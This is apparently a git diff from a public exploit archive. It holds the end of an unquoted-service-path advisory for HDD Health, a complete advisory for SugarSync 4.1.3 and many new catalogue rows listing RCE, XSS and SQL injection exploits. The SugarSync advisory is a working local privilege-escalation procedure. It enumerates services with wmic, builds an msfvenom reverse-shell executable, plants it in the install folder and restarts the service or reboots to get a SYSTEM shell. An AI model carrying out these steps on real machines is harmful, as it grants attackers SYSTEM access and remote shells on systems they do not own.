(x86)\HDD Health\HDDHealthService.exe + LOAD_ORDER_GROUP : + TAG : 0 + ISPLAY_NAME : HDDHealth + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +5. This concludes that the service is running as SYSTEM. +6. Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe. +7. Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory. +8. Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory. +9. Start a listener. +9. Now restart the HDDHealth service by giving coommand [ sc stop HDDHealth ] followed by [ sc start HDDHealth ] +9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically. +10. Got shell. + + +During my testing : + +Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe + + +# Disclaimer +============= +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. +The author prohibits any malicious use of security related information or exploits by the author or elsewhere. \ No newline at end of file diff --git a/exploits/windows/local/51106.txt b/exploits/windows/local/51106.txt new file mode 100644 index 000000000..04db1cce0 --- /dev/null +++ b/exploits/windows/local/51106.txt @@ -0,0 +1,66 @@ +# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path +# Exploit Author: Jorge Manuel Lozano Gómez +# Date: 2022-10-20 +# Vendor Homepage: https://www1.sugarsync.com +# Software Link: https://www1.sugarsync.com/apps/windows/ +# Version : 4.1.3 +# Tested on: Windows 11 64bit +# CVE : N/A + + +About Unquoted Service Path : +============================== + +When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. +(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). + +Description: +============================== +SugarSync installs a service with an unquoted service path. +To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +# PoC +=========== + +1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] +2. The vulnerable service would show up. +3. Check the service permissions by typing [ sc qc "SugarSync Service" ] +4. The command would return.. + + C:\>sc qc "SugarSync Service" + [SC] QueryServiceConfig SUCCESS + + + SERVICE_NAME: SugarSync Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe + LOAD_ORDER_GROUP : + TAG : 0 + ISPLAY_NAME : SugarSync Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +5. This concludes that the service is running as SYSTEM. +6. Now create a payload with msfvenom or other tools and name it to SugarSyncSvc.exe. +7. Make sure you have write permissions to "C:\Program Files (x86)\SugarSync" directory. +8. Provided that you have right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory. +9. Start a listener. +9. Now restart the SugarSync service by giving coommand [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ] +9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically. +10. Got shell. + + +During my testing : + +Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe + + +# Disclaimer +============= +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. +The author prohibits any malicious use of security related information or exploits by the author or elsewhere. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 403ca739b..d80561a27 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1831,6 +1831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,, 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,, 41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,, +51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-03-28,0,CVE-2022-41441,,,,, 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,, 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,, 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,, @@ -3851,6 +3852,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,,2020-05-25,2020-05-25,1,CVE-2017-15889,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb 43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,,2018-01-15,2018-01-15,1,,,,,, 16100,exploits/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",remote,hardware,,2011-02-02,2011-02-02,1,CVE-2011-0354;OSVDB-68309,,,,, +51107,exploits/hardware/remote/51107.txt,"Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access",2023-03-28,dsclee1,remote,hardware,,2023-03-28,2023-03-28,0,CVE-2022-37255,,,,, 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py 43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py 35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info @@ -5824,6 +5826,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37272,exploits/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,jsp,8080,2015-06-12,2016-10-10,1,CVE-2015-7347;CVE-2015-7346;OSVDB-123320;OSVDB-123319;OSVDB-123318,,,,http://www.exploit-db.comZCMS_1.1.zip, 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"XML External Entity (XXE)",,,, 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"Server-Side Request Forgery (SSRF)",,,, +51112,exploits/jsp/webapps/51112.txt,"ZKTeco ZEM/ZMM 8.88 - Missing Authentication",2023-03-28,"RedTeam Pentesting GmbH",webapps,jsp,,2023-03-28,2023-03-28,0,CVE-2022-42953,,,,, 40328,exploits/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php 40327,exploits/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,webapps,jsp,,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php 40325,exploits/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php @@ -10732,6 +10735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22139,exploits/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6577/info 22138,exploits/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6575/info 22140,exploits/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6578/info +51117,exploits/multiple/remote/51117.txt,"Hashicorp Consul v1.0 - Remote Command Execution (RCE)",2023-03-28,GatoGamer1155,remote,multiple,,2023-03-28,2023-03-28,0,,,,,, 35092,exploits/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",remote,multiple,,2010-12-10,2014-10-28,1,,,,,,https://www.securityfocus.com/bid/45340/info 23600,exploits/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",remote,multiple,,2004-01-26,2016-09-06,1,CVE-2004-2113;OSVDB-3754,,,,,https://www.securityfocus.com/bid/9491/info 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,,2020-06-10,2020-06-10,0,,,,,, @@ -11384,6 +11388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm, 9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,, 1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe, +51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,, 25391,exploits/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",remote,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1077;OSVDB-15634,,,,,https://www.securityfocus.com/bid/13127/info 33577,exploits/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,remote,multiple,,2009-06-10,2017-01-06,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37997/info 38974,exploits/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,remote,multiple,,2015-12-14,2017-11-02,1,,"Metasploit Framework (MSF)",,,, @@ -11882,6 +11887,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41928,exploits/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",webapps,multiple,,2017-04-25,2017-04-25,0,CVE-2017-7221,,,,, 43002,exploits/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple,,2017-10-17,2017-10-17,0,CVE-2017-15276,,,,, 37271,exploits/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",webapps,multiple,80,2015-06-12,2015-06-12,0,CVE-2015-4420;OSVDB-123307;OSVDB-123306;OSVDB-123305,,,,, +51113,exploits/multiple/webapps/51113.py,"OPSWAT Metadefender Core - Privilege Escalation",2023-03-28,"Ulascan Yildirim",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-32272,,,,, 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,,2021-01-20,2021-01-20,0,,,,,, 10448,exploits/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,webapps,multiple,,2009-12-13,,1,,,,,, 50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,,2021-07-29,2021-07-29,0,,,,,, @@ -11908,6 +11914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,, +51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,, 42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,, 33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info 50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,, @@ -14458,6 +14465,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,, 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,, 48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,, +51098,exploits/php/webapps/51098.txt,"Beauty-salon v1.0 - Remote Code Execution (RCE)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,, 17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,, 26609,exploits/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3953;OSVDB-21174,,,,,https://www.securityfocus.com/bid/15583/info @@ -14848,6 +14856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,webapps,php,,2010-04-26,,1,,,,,, 26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4375;OSVDB-21821,,,,,https://www.securityfocus.com/bid/15936/info 30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,webapps,php,,2013-12-06,2013-12-06,0,OSVDB-100746,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5163.php +51108,exploits/php/webapps/51108.txt,"BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)",2023-03-28,zetc0de,webapps,php,,2023-03-28,2023-03-28,0,CVE-2022-3552,,,,, 41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,webapps,php,,2017-01-17,2017-01-17,0,,,,,http://www.exploit-db.comBoZoN-master.zip, 7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",webapps,php,,2009-01-29,,1,OSVDB-51725;OSVDB-51724,,,,, 9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php,,2009-09-21,,1,CVE-2009-3500;OSVDB-58297;OSVDB-58296,,,,, @@ -19392,6 +19401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 30290,exploits/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",webapps,php,,2007-07-11,2013-12-15,1,,,,,,https://www.securityfocus.com/bid/24864/info 37643,exploits/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,webapps,php,,2012-08-27,2016-12-18,1,CVE-2012-0744;OSVDB-84917,,,,,https://www.securityfocus.com/bid/55125/info 32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,webapps,php,,2014-03-26,2014-03-26,0,CVE-2013-6719;OSVDB-104072;CVE-2013-6720,,,,, +51119,exploits/php/webapps/51119.txt,"iBooking v1.0.8 - Arbitrary File Upload",2023-03-28,d1z1n370/oPty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 13945,exploits/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",webapps,php,,2010-06-19,,1,OSVDB-76887;CVE-2010-5020;CVE-2010-0804;OSVDB-62681,,,,, 6444,exploits/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48127;CVE-2008-4354,,,,, 19985,exploits/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",webapps,php,,2012-07-20,2016-12-22,0,OSVDB-84391,,,,,http://secpod.org/advisories/SecPod_NetArt_Media_iBoutique_SQLi_Vuln.txt @@ -20132,6 +20142,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 30040,exploits/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",webapps,php,,2007-05-15,2013-12-05,1,CVE-2007-1898;OSVDB-34088,,,,,https://www.securityfocus.com/bid/23989/info 6549,exploits/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,webapps,php,,2008-09-23,,1,OSVDB-51677;CVE-2008-5992;OSVDB-51676;OSVDB-48554;OSVDB-48553,,,,, 6542,exploits/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,webapps,php,,2008-09-22,2016-12-22,1,OSVDB-48518;CVE-2008-6401,,,,, +51104,exploits/php/webapps/51104.txt,"Jetpack 11.4 - Cross Site Scripting (XSS)",2023-03-28,"Behrouz Mansoori",webapps,php,,2023-03-28,2023-03-28,0,,,,,, 27619,exploits/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24494,,,,,https://www.securityfocus.com/bid/17449/info 27617,exploits/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24492,,,,,https://www.securityfocus.com/bid/17449/info 27618,exploits/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24493,,,,,https://www.securityfocus.com/bid/17449/info @@ -23275,6 +23286,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 24279,exploits/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],webapps,php,,2004-07-13,2013-01-21,1,CVE-2004-0725;OSVDB-7865,,,,,https://www.securityfocus.com/bid/10718/info 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,"Cross-Site Scripting (XSS)",,,, 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,Traversal,,,, +51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,, 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip, 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,, 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,, @@ -24501,6 +24513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,, 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,, 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,, +51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,, 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info 44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,, 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,, @@ -28482,6 +28495,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,,2020-12-14,2020-12-14,0,,,,,, 49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,, 48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,, +51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip, 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip, @@ -28814,6 +28828,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info 34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,, 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,, +51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative 